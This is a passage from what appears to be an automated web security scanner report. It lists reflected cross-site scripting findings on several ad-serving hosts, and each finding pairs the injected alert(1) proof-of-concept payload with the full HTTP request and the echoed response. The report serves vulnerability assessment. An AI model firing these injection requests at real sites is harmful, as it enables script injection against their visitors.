<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.25. http://ad.harrenmedianetwork.com/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.26. http://ad.harrenmedianetwork.com/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.27. http://ad.harrenmedianetwork.com/st [ad_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&inv_code=429613&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&s=429613&t=2" target="parent">
...[SNIP]...

4.28. http://ad.harrenmedianetwork.com/st [ad_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x6008e920'-alert(1)-'fcb38195981&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x6008e920%27-alert%281%29-%27fcb38195981%26section%3D429613">
...[SNIP]...

4.29. http://ad.harrenmedianetwork.com/st [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f47e8'-alert(1)-'64ed47f711b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x600%26section%3D429613f47e8%27-alert%281%29-%2764ed47f711b">
...[SNIP]...

4.30. http://ad.harrenmedianetwork.com/st [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f92b8"><script>alert(1)</script>05d28b2545d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613f92b8"><script>alert(1)</script>05d28b2545d&t=2" target="parent">
...[SNIP]...

4.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.reduxmedia.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

4.32. http://ad.scanmedios.com/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.33. http://ad.scanmedios.com/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.34. http://ad.scanmedios.com/st [ad_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250a927c"><script>alert(1)</script>8783e6815d8&inv_code=601669&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250a927c"><script>alert(1)</script>8783e6815d8&s=601669&t=2" target="parent">
...[SNIP]...

4.35. http://ad.scanmedios.com/st [ad_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250dce2d'-alert(1)-'7ba8e3efc79&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250dce2d%27-alert%281%29-%277ba8e3efc79%26section%3D601669">
...[SNIP]...

4.36. http://ad.scanmedios.com/st [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669f734e'-alert(1)-'2b959f792a9&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D601669f734e%27-alert%281%29-%272b959f792a9">
...[SNIP]...

4.37. http://ad.scanmedios.com/st [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669a9583"><script>alert(1)</script>2bc6827f86d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669a9583"><script>alert(1)</script>2bc6827f86d&t=2" target="parent">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
